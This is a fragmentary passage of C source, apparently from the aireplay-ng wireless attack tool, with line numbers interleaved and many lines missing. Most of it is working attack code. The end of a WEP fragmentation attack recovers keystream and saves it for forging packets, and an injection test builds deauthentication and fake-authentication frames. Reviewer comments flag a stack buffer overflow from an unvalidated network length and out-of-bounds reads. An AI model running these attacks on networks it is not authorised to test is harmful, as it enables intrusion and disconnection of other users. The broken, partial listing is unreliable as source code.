if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4282
PCT; printf("No answer, repeating...\n");
4287
PCT; printf("Still nothing, trying another packet...\n");
4295
if(again == NEW_IV) continue;
4297
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 60);
4298
if (caplen-z == 68-24)
4300
//Thats the ARP packet!
4301
// PCT; printf("Thats our ARP packet!\n");
4303
if (caplen-z == 71-24)
4305
//Thats the LLC NULL packet!
4306
// PCT; printf("Thats our LLC Null packet!\n");
4307
memset(h80211+24, '\x00', 39);
4312
//Building expected cleartext
4313
uchar ct[4096] = "\xaa\xaa\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x02";
4314
//Ethernet & ARP header
4316
//Followed by the senders MAC and IP:
4317
memcpy(ct+16, packet+16, 6);
4318
memcpy(ct+22, opt.r_dip, 4);
4320
//And our own MAC and IP:
4321
memcpy(ct+26, opt.r_smac, 6);
4322
memcpy(ct+32, opt.r_sip, 4);
4325
memcpy(prga, packet+z+4, 36);
4326
xor_keystream(prga, ct, 36);
4330
memcpy(prga, packet+z+4, 36);
4331
xor_keystream(prga, h80211+24, 36);
4334
memcpy(iv, packet+z, 4);
4337
while(again == RETRY)
4341
PCT; printf("Trying to get 384 bytes of a keystream\n");
4345
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, arplen);
4346
if ((round % 2) == 1)
4348
PCT; printf("Trying a LLC NULL packet\n");
4349
memset(h80211+24, '\x00', arplen+8);
4354
packets=(arplen-24)/(32);
4355
if( (arplen-24)%(32) != 0 )
4358
send_fragments(h80211, arplen, iv, prga, 32, 0);
4360
// send_packet(ack, 10);
4362
gettimeofday( &tv, NULL );
4365
while (!gotit) //waiting for relayed packet
4367
caplen = read_packet(packet, sizeof(packet), NULL);
4368
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4369
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4372
if (packet[0] == 0xD4 )
4374
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4379
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4381
if ( (packet[1] & 2) ) //Is a FromDS packet with valid IV
4383
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4385
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4387
if (caplen-z > 400-24 && caplen-z < 500-24) //Is short enough
4389
//This is our relayed packet!
4390
PCT; printf("Got RELAYED packet!!\n");
4399
/* check if we got an deauthentication packet */
4401
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4403
PCT; printf( "Got a deauthentication packet!\n" );
4404
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4407
/* check if we got an disassociation packet */
4409
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4411
PCT; printf( "Got a disassociation packet!\n" );
4412
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4415
gettimeofday( &tv2, NULL );
4416
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4418
PCT; printf("Not enough acks, repeating...\n");
4423
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4425
PCT; printf("No answer, repeating...\n");
4430
PCT; printf("Still nothing, trying another packet...\n");
4438
if(again == NEW_IV) continue;
4440
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 408);
4441
if (caplen-z == 416-24)
4443
//Thats the ARP packet!
4444
// PCT; printf("Thats our ARP packet!\n");
4446
if (caplen-z == 448-24)
4448
//Thats the LLC NULL packet!
4449
// PCT; printf("Thats our LLC Null packet!\n");
4450
memset(h80211+24, '\x00', 416);
4453
memcpy(iv, packet+z, 4);
4454
memcpy(prga, packet+z+4, 384);
4455
xor_keystream(prga, h80211+24, 384);
4459
while(again == RETRY)
4463
PCT; printf("Trying to get 1500 bytes of a keystream\n");
4465
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 1500);
4467
if ((round % 2) == 1)
4469
PCT; printf("Trying a LLC NULL packet\n");
4470
memset(h80211+24, '\x00', 1508);
4475
packets=(arplen-24)/(300);
4476
if( (arplen-24)%(300) != 0 )
4479
send_fragments(h80211, arplen, iv, prga, 300, 0);
4481
// send_packet(ack, 10);
4483
gettimeofday( &tv, NULL );
4486
while (!gotit) //waiting for relayed packet
4488
caplen = read_packet(packet, sizeof(packet), NULL);
4489
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4490
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4493
if (packet[0] == 0xD4 )
4495
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4500
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4502
if ( (packet[1] & 2) ) //Is a FromDS packet with valid IV
4504
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4506
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4508
if (caplen-z > 1496-24) //Is short enough
4510
//This is our relayed packet!
4511
PCT; printf("Got RELAYED packet!!\n");
4520
/* check if we got an deauthentication packet */
4522
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4524
PCT; printf( "Got a deauthentication packet!\n" );
4525
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4528
/* check if we got an disassociation packet */
4530
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4532
PCT; printf( "Got a disassociation packet!\n" );
4533
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4536
gettimeofday( &tv2, NULL );
4537
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4539
PCT; printf("Not enough acks, repeating...\n");
4544
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4546
PCT; printf("No answer, repeating...\n");
4551
printf("Still nothing, quitting with 384 bytes? [y/n] \n");
4554
while(!ret) ret = scanf( "%s", tmpbuf );
4558
if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' )
4568
if(again == NEW_IV) continue;
4570
if(again == ABORT) length = 408;
4573
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, length);
4574
if (caplen == length+8+z)
4576
//Thats the ARP packet!
4577
// PCT; printf("Thats our ARP packet!\n");
4579
if (caplen == length+16+z)
4581
//Thats the LLC NULL packet!
4582
// PCT; printf("Thats our LLC Null packet!\n");
4583
memset(h80211+24, '\x00', length+8);
4588
memcpy(iv, packet+z, 4);
4589
memcpy(prga, packet+z+4, length);
4590
xor_keystream(prga, h80211+24, length);
4593
lt = localtime( (const time_t *) &tv.tv_sec );
4595
memset( strbuf, 0, sizeof( strbuf ) );
4596
snprintf( strbuf, sizeof( strbuf ) - 1,
4597
"fragment-%02d%02d-%02d%02d%02d.xor",
4598
lt->tm_mon + 1, lt->tm_mday,
4599
lt->tm_hour, lt->tm_min, lt->tm_sec );
4600
save_prga(strbuf, iv, prga, length);
4602
printf( "Saving keystream in %s\n", strbuf );
4603
printf("Now you can build a packet with packetforge-ng out of that %d bytes keystream\n", length);
/* Parse a beacon (0x80) or probe response (0x50) of len bytes: walk the
 * tagged parameters to find the DS channel tag (3) and the ESSID tag (0),
 * then record BSSID/ESSID/channel in the global ap[] table (or just mark
 * an already-known AP as found when the frame is a probe response).
 * Returns -1 when a tag is missing, malformed or the ESSID is not printable
 * ASCII; the final return value and the loop headers are not in this
 * excerpt of the listing. */
int grab_essid(uchar* packet, int len)
4614
int i=0, j=0, pos=0, tagtype=0, taglen=0, chan=0;
4617
memcpy(bssid, packet+16, 6);    /* addr3 = BSSID for management frames */
4618
taglen = 22; //initial value to get the fixed tags parsing started
4619
taglen+= 12; //skip fixed tags in frames (34 + 2 = 24-byte header + 12 fixed parameters, presumably applied as pos += taglen + 2 on a line not shown)
4623
tagtype = packet[pos];          /* NOTE(review): pos is only compared with len-2 in the while condition below, i.e. AFTER these two reads; a truncated or crafted frame whose last tag length points past the end is read out of bounds. Check pos + 2 <= len before indexing. */
4624
taglen = packet[pos+1];
4625
} while(tagtype != 3 && pos < len-2);
4627
if(tagtype != 3) return -1;     /* no DS parameter set tag */
4628
if(taglen != 1) return -1;      /* channel tag is exactly one byte */
4629
if(pos+2+taglen > len) return -1;
4631
chan = packet[pos+2];
4635
taglen = 22; //initial value to get the fixed tags parsing started (second walk, this time for the ESSID tag)
4636
taglen+= 12; //skip fixed tags in frames
4640
tagtype = packet[pos];          /* same unchecked read as in the first walk */
4641
taglen = packet[pos+1];
4642
} while(tagtype != 0 && pos < len-2);
4644
if(tagtype != 0) return -1;     /* no SSID tag */
4645
if(taglen > 250) taglen = 250;  /* clamp to the ap[i].essid storage; ap[i].essid[taglen] = '\0' below needs room for 251 bytes — confirm against struct APt */
4646
if(pos+2+taglen > len) return -1;
4652
if( memcmp(bssid, ap[i].bssid, 6) == 0 ) //got it already
4654
if(packet[0] == 0x50 && !ap[i].found)   /* first probe response from a known AP */
4658
if(ap[i].chan == 0) ap[i].chan=chan;    /* fill in the channel if an earlier frame lacked it */
4664
for(j=0; j<taglen; j++)
4666
if(packet[pos+2+j] < 32 || packet[pos+2+j] > 127)   /* reject non-printable ESSID bytes (the rejection itself is on a line not shown) */
4674
memcpy(ap[i].essid, packet+pos+2, taglen);
4675
ap[i].essid[taglen] = '\0';
4676
memcpy(ap[i].bssid, bssid, 6);
4678
if(packet[0] == 0x50) ap[i].found++;    /* count probe responses per AP */
/* Split an "ip[:port]" string (iface) into a dotted-quad copy in ip
 * (ip_size bytes) and, presumably, the port number as the return value;
 * -1 stands for "no port given".  The port parsing, the `out:` label and
 * the release of host are on lines not in this excerpt. */
static int get_ip_port(char *iface, char *ip, const int ip_size)
4690
struct in_addr addr;
4692
host = strdup(iface);            /* NOTE(review): result is not NULL-checked; strchr() below would dereference NULL on allocation failure. host must be freed on every exit path. */
4696
ptr = strchr(host, ':');         /* optional ":port" suffix */
4702
if (!inet_aton(host, (struct in_addr *)&addr))   /* only numeric addresses are accepted */
4703
goto out; /* XXX resolve hostname */
4705
if(strlen(host) > 15)            /* a dotted quad is at most 15 characters */
4710
strncpy(ip, host, ip_size);      /* NUL-terminated only because strlen(host) <= 15 was enforced above; assumes ip_size >= 16 at every caller — TODO confirm */
4712
if(port <= 0) port = -1;         /* no or invalid port -> -1 */
/* Hex-dump len bytes of packet to stdout: a space after every 4 bytes and
 * a line break every 16 bytes.  len is trusted; it must not exceed the
 * buffer behind packet.  The end of the function is not in this excerpt. */
void dump_packet(unsigned char* packet, int len)
4723
for(i=0; i<len; i++)
4725
if(i>0 && i%4 == 0)printf(" ");     /* column gap every 4 bytes */
4726
if(i>0 && i%16 == 0)printf("\n");   /* new row every 16 bytes */
4727
printf("%02X ", packet[i]);
/* Probe a TCP endpoint (an airserv-ng instance) at ip_str:port.
 * 1. connect non-blocking with a 3 s timeout,
 * 2. send one zeroed command header (the GET_CHAN command per the comment
 *    below) and wait up to 1 s for a reply to decide whether airserv-ng
 *    answers,
 * 3. time REQUESTS further connects and print min/avg/max in ms.
 * Loop bodies, socket closes and the return values are on lines not in
 * this excerpt. */
int tcp_test(const char* ip_str, const short port)
4741
struct sockaddr_in s_in;
4742
int packetsize = 1024;
4743
unsigned char packet[packetsize];   /* VLA sized by a non-const int; in practice a 1024-byte stack buffer */
4744
struct timeval tv, tv2, tv3;
4746
int times[REQUESTS];                /* per-request connect time in microseconds */
4747
int min, avg, max, len;
4753
s_in.sin_family = PF_INET;          /* AF_INET is the conventional constant for sin_family (same value on Linux) */
4754
s_in.sin_port = htons(port);
4755
if (!inet_aton(ip_str, &s_in.sin_addr))
4758
if ((sock = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1)
4761
/* avoid blocking on reading the socket */
4762
if( fcntl( sock, F_SETFL, O_NONBLOCK ) < 0 )
4764
perror( "fcntl(O_NONBLOCK) failed" );
4768
gettimeofday( &tv, NULL );
4770
while (1) //waiting for the non-blocking connect to complete
4772
if (connect(sock, (struct sockaddr*) &s_in, sizeof(s_in)) == -1)
4774
if(errno != EINPROGRESS && errno != EALREADY)   /* anything but "still connecting" is a real failure */
4779
printf("Failed to connect\n");
4786
gettimeofday( &tv2, NULL );
4790
gettimeofday( &tv2, NULL );
4791
//wait 3000ms for a successful connect
4792
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3000*1000))
4794
printf("Connection timed out\n");
4801
PCT; printf("TCP connection successful\n");
4803
//trying to identify airserv-ng
4804
memset(&nh, 0, sizeof(nh));
4805
// command: GET_CHAN
4807
nh.nh_len = htonl(0);               /* zero-length payload */
4809
if (send(sock, &nh, sizeof(nh), 0) != sizeof(nh))
4815
gettimeofday( &tv, NULL );
4818
while (1) //waiting for GET_CHAN answer
4820
caplen = read(sock, &nh, sizeof(nh));
4824
if( errno != EAGAIN )               /* errno is only meaningful when read() returned -1; presumably guarded on a line not shown */
4831
if( (unsigned)caplen == sizeof(nh))
4833
len = ntohl(nh.nh_len);             /* NOTE(review): length is supplied by the remote peer and is never validated */
4834
if( nh.nh_type == 1 && i==0 )
4837
caplen = read(sock, packet, len);   /* NOTE(review): stack buffer overflow — packet holds packetsize (1024) bytes but len comes from the wire; a hostile or buggy peer can overrun it. Reject before either read: if (len < 0 || (size_t)len > sizeof(packet)) { close(sock); return -1; } */
4850
caplen = read(sock, packet, len);   /* same unbounded read as above */
4854
gettimeofday( &tv2, NULL );
4855
//wait 1000ms for an answer
4856
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1000*1000))
4866
PCT; printf("airserv-ng found\n");
4870
PCT; printf("airserv-ng NOT found\n");
4875
for(i=0; i<REQUESTS; i++)           /* latency measurement: one fresh connect per iteration */
4877
if ((sock = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1)
4880
/* avoid blocking on reading the socket */
4881
if( fcntl( sock, F_SETFL, O_NONBLOCK ) < 0 )
4883
perror( "fcntl(O_NONBLOCK) failed" );
4889
gettimeofday( &tv, NULL );
4891
while (1) //waiting for the non-blocking connect to complete
4893
if (connect(sock, (struct sockaddr*) &s_in, sizeof(s_in)) == -1)
4895
if(errno != EINPROGRESS && errno != EALREADY)
4900
printf("Failed to connect\n");
4907
gettimeofday( &tv2, NULL );
4911
gettimeofday( &tv2, NULL );
4912
//wait 1000ms for a successful connect
4913
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1000*1000))
4917
//simple "high-precision" usleep
4918
select(1, NULL, NULL, NULL, &tv3);  /* no fds: select() is used purely as a sub-millisecond sleep; tv3 is set on a line not shown */
4920
times[i] = ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec));   /* elapsed microseconds for this connect */
4921
printf( "\r%d/%d\r", i, REQUESTS);
4930
for(i=0; i<REQUESTS; i++)
4932
if(times[i] < min) min = times[i];  /* min/max initial values are set on lines not shown */
4933
if(times[i] > max) max = times[i];
4938
PCT; printf("ping %s:%d (min/avg/max): %.3fms/%.3fms/%.3fms\n", ip_str, port, min/1000.0, avg/1000.0, max/1000.0);   /* microseconds -> ms; port is a signed short, so values above 32767 print negative */
int do_attack_test()
4946
struct timeval tv, tv2, tv3;
4947
int len=0, i=0, j=0, k=0;
4948
int gotit=0, answers=0, found=0;
4949
int caplen=0, essidlen=0;
4950
unsigned int min, avg, max;
4954
int atime=200; //time in ms to wait for answer packet (needs to be higher for airserv)
4955
unsigned char nulldata[1024];
4957
if(opt.port_out > 0)
4960
PCT; printf("Testing connection to injection device %s\n", opt.iface_out);
4961
ret = tcp_test(opt.ip_out, opt.port_out);
4968
/* open the replay interface */
4969
_wi_out = wi_open(opt.iface_out);
4973
dev.fd_out = wi_fd(_wi_out);
4974
wi_get_mac(_wi_out, dev.mac_out);
4975
if(opt.s_face == NULL)
4978
dev.fd_in = dev.fd_out;
4981
dev.arptype_in = dev.arptype_out;
4982
wi_get_mac(_wi_in, dev.mac_in);
4986
if(opt.s_face && opt.port_in > 0)
4989
PCT; printf("Testing connection to capture device %s\n", opt.s_face);
4990
ret = tcp_test(opt.ip_in, opt.port_in);
4997
/* open the packet source */
4998
_wi_in = wi_open(opt.s_face);
5001
dev.fd_in = wi_fd(_wi_in);
5002
wi_get_mac(_wi_in, dev.mac_in);
5005
else if(opt.s_face && opt.port_in <= 0)
5007
_wi_in = wi_open(opt.s_face);
5010
dev.fd_in = wi_fd(_wi_in);
5011
wi_get_mac(_wi_in, dev.mac_in);
5015
if(opt.port_in <= 0)
5017
/* avoid blocking on reading the socket */
5018
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
5020
perror( "fcntl(O_NONBLOCK) failed" );
5025
if(getnet(NULL, 0, 0) != 0)
5028
srand( time( NULL ) );
5030
memset(ap, '\0', 20*sizeof(struct APt));
5032
essidlen = strlen(opt.r_essid);
5033
if( essidlen > 250) essidlen = 250;
5039
ap[0].len = essidlen;
5040
memcpy(ap[0].essid, opt.r_essid, essidlen);
5041
ap[0].essid[essidlen] = '\0';
5042
memcpy(ap[0].bssid, opt.r_bssid, 6);
5047
set_bitrate(_wi_out, RATE_1M);
5049
PCT; printf("Trying broadcast probe requests...\n");
5051
memcpy(h80211, PROBE_REQ, 24);
5055
h80211[24] = 0x00; //ESSID Tag Number
5056
h80211[25] = 0x00; //ESSID Tag Length
5060
memcpy(h80211+len, RATES, 16);
5069
random source so we can identify our packets
5071
opt.r_smac[0] = 0x00;
5072
opt.r_smac[1] = rand() & 0xFF;
5073
opt.r_smac[2] = rand() & 0xFF;
5074
opt.r_smac[3] = rand() & 0xFF;
5075
opt.r_smac[4] = rand() & 0xFF;
5076
opt.r_smac[5] = rand() & 0xFF;
5078
memcpy(h80211+10, opt.r_smac, 6);
5080
send_packet(h80211, len);
5082
gettimeofday( &tv, NULL );
5084
while (1) //waiting for relayed packet
5086
caplen = read_packet(packet, sizeof(packet), &ri);
5088
if (packet[0] == 0x50 ) //Is probe response
5090
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5092
if(grab_essid(packet, caplen) == 0 && (!memcmp(opt.r_bssid, NULL_MAC, 6)))
5098
PCT; printf("Injection is working!\n");
5099
if(opt.fast) return 0;
5106
if (packet[0] == 0x80 ) //Is beacon frame
5108
if(grab_essid(packet, caplen) == 0 && (!memcmp(opt.r_bssid, NULL_MAC, 6)))
5114
gettimeofday( &tv2, NULL );
5115
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3*atime*1000)) //wait 'atime'ms for an answer
5123
PCT; printf("No Answer...\n");
5126
PCT; printf("Found %d AP%c\n", found, ((found == 1) ? ' ' : 's' ) );
5131
PCT; printf("Trying directed probe requests...\n");
5134
for(i=0; i<found; i++)
5136
if(wi_get_channel(_wi_out) != ap[i].chan)
5138
wi_set_channel(_wi_out, ap[i].chan);
5141
if(wi_get_channel(_wi_in) != ap[i].chan)
5143
wi_set_channel(_wi_in, ap[i].chan);
5146
PCT; printf("%02X:%02X:%02X:%02X:%02X:%02X - channel: %d - \'%s\'\n", ap[i].bssid[0], ap[i].bssid[1],
5147
ap[i].bssid[2], ap[i].bssid[3], ap[i].bssid[4], ap[i].bssid[5], ap[i].chan, ap[i].essid);
5155
memcpy(h80211, PROBE_REQ, 24);
5159
h80211[24] = 0x00; //ESSID Tag Number
5160
h80211[25] = ap[i].len; //ESSID Tag Length
5161
memcpy(h80211+len+2, ap[i].essid, ap[i].len);
5165
memcpy(h80211+len, RATES, 16);
5169
for(j=0; j<REQUESTS; j++)
5172
random source so we can identify our packets
5174
opt.r_smac[0] = 0x00;
5175
opt.r_smac[1] = rand() & 0xFF;
5176
opt.r_smac[2] = rand() & 0xFF;
5177
opt.r_smac[3] = rand() & 0xFF;
5178
opt.r_smac[4] = rand() & 0xFF;
5179
opt.r_smac[5] = rand() & 0xFF;
5181
//build/send probe request
memcpy(h80211+10, opt.r_smac, 6);
send_packet(h80211, len);
//build/send request-to-send
memcpy(nulldata, RTS, 16);
memcpy(nulldata+4, ap[i].bssid, 6);
memcpy(nulldata+10, opt.r_smac, 6);
send_packet(nulldata, 16);
//build/send null data packet
memcpy(nulldata, NULL_DATA, 24);
memcpy(nulldata+4, ap[i].bssid, 6);
memcpy(nulldata+10, opt.r_smac, 6);
memcpy(nulldata+16, ap[i].bssid, 6);
send_packet(nulldata, 24);
//build/send auth request packet
memcpy(nulldata, AUTH_REQ, 30);
memcpy(nulldata+4, ap[i].bssid, 6);
memcpy(nulldata+10, opt.r_smac, 6);
memcpy(nulldata+16, ap[i].bssid, 6);
send_packet(nulldata, 30);
gettimeofday( &tv, NULL );
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
while (1) //waiting for relayed packet
caplen = read_packet(packet, sizeof(packet), &ri);
if (packet[0] == 0x50 ) //Is probe response
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
if(! memcmp(ap[i].bssid, packet+16, 6)) //From the mentioned AP
gettimeofday( &tv3, NULL);
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
PCT; printf("Injection is working!\n\n");
if((signed)ri.ri_power > -200)
ap[i].pwr[j] = (signed)ri.ri_power;
if (packet[0] == 0xC4 ) //Is clear-to-send
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
gettimeofday( &tv3, NULL);
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
PCT; printf("Injection is working!\n\n");
if((signed)ri.ri_power > -200)
ap[i].pwr[j] = (signed)ri.ri_power;
if (packet[0] == 0xD4 ) //Is ack
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
gettimeofday( &tv3, NULL);
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
PCT; printf("Injection is working!\n\n");
if((signed)ri.ri_power > -200)
ap[i].pwr[j] = (signed)ri.ri_power;
if (packet[0] == 0xB0 ) //Is auth response
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
if (! memcmp(packet+10, packet+16, 6)) //From BSS ID
gettimeofday( &tv3, NULL);
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
PCT; printf("Injection is working!\n\n");
if((signed)ri.ri_power > -200)
ap[i].pwr[j] = (signed)ri.ri_power;
gettimeofday( &tv2, NULL );
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (atime*1000)) //wait 'atime'ms for an answer
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
for(j=0; j<REQUESTS; j++)
if(ap[i].ping[j] > 0)
if(ap[i].ping[j] > max) max = ap[i].ping[j];
if(ap[i].ping[j] < min) min = ap[i].ping[j];
avg += ap[i].ping[j];
avg2 += ap[i].pwr[j];
avg2 /= ap[i].found;
PCT; printf("Ping (min/avg/max): %.3fms/%.3fms/%.3fms Power: %.2f\n", (min/1000.0), (avg/1000.0), (max/1000.0), avg2);
PCT; printf("%2d/%2d: %3d%%\n\n", ap[i].found, REQUESTS, ((ap[i].found*100)/REQUESTS));
if(!gotit && answers)
PCT; printf("Injection is working!\n\n");
PCT; printf("Trying directed probe requests for all bitrates...\n");
for(i=0; i<found; i++)
if(ap[i].found <= 0)
PCT; printf("%02X:%02X:%02X:%02X:%02X:%02X - channel: %d - \'%s\'\n", ap[i].bssid[0], ap[i].bssid[1],
ap[i].bssid[2], ap[i].bssid[3], ap[i].bssid[4], ap[i].bssid[5], ap[i].chan, ap[i].essid);
memcpy(h80211, PROBE_REQ, 24);
h80211[24] = 0x00; //ESSID Tag Number
h80211[25] = ap[i].len; //ESSID Tag Length
memcpy(h80211+len+2, ap[i].essid, ap[i].len);
memcpy(h80211+len, RATES, 16);
for(k=0; k<RATE_NUM; k++)
if(set_bitrate(_wi_out, bitrates[k]))
memset(ap[i].pwr, 0, REQUESTS*sizeof(unsigned int));
for(j=0; j<REQUESTS; j++)
random source so we can identify our packets
opt.r_smac[0] = 0x00;
opt.r_smac[1] = rand() & 0xFF;
opt.r_smac[2] = rand() & 0xFF;
opt.r_smac[3] = rand() & 0xFF;
opt.r_smac[4] = rand() & 0xFF;
opt.r_smac[5] = rand() & 0xFF;
memcpy(h80211+10, opt.r_smac, 6);
send_packet(h80211, len);
gettimeofday( &tv, NULL );
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
while (1) //waiting for relayed packet
caplen = read_packet(packet, sizeof(packet), &ri);
if (packet[0] == 0x50 ) //Is probe response
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
if(! memcmp(ap[i].bssid, packet+16, 6)) //From the mentioned AP
if((signed)ri.ri_power > -200)
ap[i].pwr[j] = (signed)ri.ri_power;
gettimeofday( &tv2, NULL );
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000)) //wait 300ms for an answer
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
for(j=0; j<REQUESTS; j++)
avg2 += ap[i].pwr[j];
avg2 /= ap[i].found;
PCT; printf("Probing at %2.1f Mbps:\t%2d/%2d: %3d%%\n", wi_get_rate(_wi_out)/1000000.0,
ap[i].found, REQUESTS, ((ap[i].found*100)/REQUESTS));
if(!gotit && answers)
PCT; printf("Injection is working!\n\n");
if(opt.fast) return 0;
set_bitrate(_wi_out, RATE_1M);
if( opt.s_face != NULL )
PCT; printf("Trying card-to-card injection...\n");
/* sync both cards to the same channel, or the test will fail */
if(wi_get_channel(_wi_out) != wi_get_channel(_wi_in))
wi_set_channel(_wi_out, wi_get_channel(_wi_in));
opt.f_smac[0] = 0x00;
opt.f_smac[1] = rand() & 0xFF;
opt.f_smac[2] = rand() & 0xFF;
opt.f_smac[3] = rand() & 0xFF;
opt.f_smac[4] = rand() & 0xFF;
opt.f_smac[5] = rand() & 0xFF;
opt.f_dmac[0] = 0x00;
opt.f_dmac[1] = rand() & 0xFF;
opt.f_dmac[2] = rand() & 0xFF;
opt.f_dmac[3] = rand() & 0xFF;
opt.f_dmac[4] = rand() & 0xFF;
opt.f_dmac[5] = rand() & 0xFF;
opt.f_bssid[0] = 0x00;
opt.f_bssid[1] = rand() & 0xFF;
opt.f_bssid[2] = rand() & 0xFF;
opt.f_bssid[3] = rand() & 0xFF;
opt.f_bssid[4] = rand() & 0xFF;
opt.f_bssid[5] = rand() & 0xFF;
if(i==0) //attack -0
memcpy( h80211, DEAUTH_REQ, 26 );
memcpy( h80211 + 16, opt.f_bssid, 6 );
memcpy( h80211 + 4, opt.f_dmac, 6 );
memcpy( h80211 + 10, opt.f_smac, 6 );
opt.f_tods = 0; opt.f_fromds = 0;
opt.f_minlen = opt.f_maxlen = 26;
else if(i==1) //attack -1 (open)
memcpy( h80211, AUTH_REQ, 30 );
memcpy( h80211 + 4, opt.f_dmac, 6 );
memcpy( h80211 + 10, opt.f_smac , 6 );
memcpy( h80211 + 16, opt.f_bssid, 6 );
opt.f_tods = 0; opt.f_fromds = 0;
opt.f_minlen = opt.f_maxlen = 30;
else if(i==2) //attack -1 (psk)
memcpy( h80211, ska_auth3, 24);
memcpy( h80211 + 4, opt.f_dmac, 6);
memcpy( h80211 + 10, opt.f_smac, 6);
memcpy( h80211 + 16, opt.f_bssid, 6);
//random bytes (as encrypted data)
for(j=0; j<132; j++)
h80211[28+j] = rand() & 0xFF;
opt.f_tods = 0; opt.f_fromds = 0;
opt.f_minlen = opt.f_maxlen = 24+4+132;
else if(i==3) //attack -3
memcpy( h80211, NULL_DATA, 24);
memcpy( h80211 + 4, opt.f_bssid, 6);
memcpy( h80211 + 10, opt.f_smac, 6);
memcpy( h80211 + 16, opt.f_dmac, 6);
//random bytes (as encrypted data)
for(j=0; j<132; j++)
h80211[28+j] = rand() & 0xFF;
opt.f_tods = 1; opt.f_fromds = 0;
opt.f_minlen = opt.f_maxlen = 24+4+132;
else if(i==4) //attack -5
memcpy( h80211, NULL_DATA, 24);
memcpy( h80211 + 4, opt.f_bssid, 6);
memcpy( h80211 + 10, opt.f_smac, 6);
memcpy( h80211 + 16, opt.f_dmac, 6);
//random bytes (as encrypted data)
h80211[28+j] = rand() & 0xFF;
opt.f_tods = 1; opt.f_fromds = 0;
opt.f_minlen = opt.f_maxlen = 24+4+7;
for(j=0; (j<(REQUESTS/4) && !k); j++) //try it 5 times
send_packet( h80211, opt.f_minlen );
gettimeofday( &tv, NULL );
